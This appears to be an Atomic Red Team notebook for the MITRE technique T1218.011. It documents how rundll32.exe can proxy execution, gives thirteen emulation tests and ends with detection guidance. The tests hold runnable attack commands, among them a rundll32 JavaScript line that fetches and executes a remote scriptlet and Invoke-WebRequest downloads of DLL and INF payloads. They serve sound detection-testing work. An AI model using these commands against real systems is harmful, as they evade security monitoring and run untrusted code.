# T1218.011 - Rundll32
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) 

## Atomic Tests

### Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObjectTest execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. 
This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/)

Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed. 
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct").Exec();window.close();
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 1

#### Cleanup: 
```cmd
taskkill /IM notepad.exe /f
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Rundll32 execute VBscript commandTest execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 2

### Atomic Test #3 - Rundll32 execute VBscript command using Ordinal numberTest execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("calc.exe"),0)
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 3

### Atomic Test #4 - Rundll32 advpack.dll Execution
Test execution of a command using rundll32.exe with advpack.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
Upon execution calc.exe will be launched

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Inf file must exist on disk at specified location ("#{inf_to_execute}")

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.011\src\T1218.011.inf") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.011\src\T1218.011.inf") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "PathToAtomicsFolder\T1218.011\src\T1218.011.inf"

```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe advpack.dll,LaunchINFSection "PathToAtomicsFolder\T1218.011\src\T1218.011.inf",DefaultInstall_SingleUser,1,
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 4

### Atomic Test #5 - Rundll32 ieadvpack.dll Execution
Test execution of a command using rundll32.exe with ieadvpack.dll.
Upon execution calc.exe will be launched

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Inf file must exist on disk at specified location ("#{inf_to_execute}")

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.011\src\T1218.011.inf") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.011\src\T1218.011.inf") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "PathToAtomicsFolder\T1218.011\src\T1218.011.inf"

```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe ieadvpack.dll,LaunchINFSection "PathToAtomicsFolder\T1218.011\src\T1218.011.inf",DefaultInstall_SingleUser,1,
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 5

### Atomic Test #6 - Rundll32 syssetup.dll Execution
Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Inf file must exist on disk at specified location ("#{inf_to_execute}")

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf"

```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf"
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 6

### Atomic Test #7 - Rundll32 setupapi.dll Execution
Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened

Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Inf file must exist on disk at specified location ("#{inf_to_execute}")

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf"

```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf"
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 7

### Atomic Test #8 - Execution of HTA and VBS Files using Rundll32 and URL.dllIcedID uses this TTP as follows:
  rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta
Trickbot uses this TTP as follows:
  rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs

In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript"
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 8

### Atomic Test #9 - Launches an executable using Rundll32 and pcwutl.dllExecutes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe pcwutl.dll,LaunchApplication %windir%\System32\notepad.exe
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 9

### Atomic Test #10 - Execution of non-dll using rundll32.exe
Rundll32.exe running non-dll 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Non-dll file must exist on disk at specified location

##### Check Prereq Commands:
```powershell
if (Test-Path C:\Users\$env:username\Downloads\calc.png) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll" -OutFile "C:\Users\$env:username\Downloads\calc.png"

```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
rundll32.exe C:\Users\$env:username\Downloads\calc.png, StartW
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 10

### Atomic Test #11 - Rundll32 with Ordinal Value
Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. 
Upon successful execution, Calc.exe will spawn.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: DLL file must exist on disk at specified location

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll" -OutFile "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll"

```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 11 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe "PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll",#2
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 11

### Atomic Test #12 - Rundll32 with Control_RunDLL
Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. 

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: DLL file must exist on disk at specified location

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1047\bin\calc.dll") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll" -OutFile "PathToAtomicsFolder\T1047\bin\calc.dll"

```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 12 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
rundll32.exe shell32.dll,Control_RunDLL "PathToAtomicsFolder\T1047\bin\calc.dll"
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 12

### Atomic Test #13 - Rundll32 with desk.cplRundll32.exe loading an executable renamed as .scr using desk.cpl 
Reference: 
  - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)
SIGMA rules:
  - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml)
  - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
copy %windir%\System32\calc.exe not_an_scr.scr
rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 13

#### Cleanup: 
```cmd
del not_an_scr.scr```

In [ ]:
Invoke-AtomicTest T1218.011 -TestNumbers 13 -Cleanup

## Detection
Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.

Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.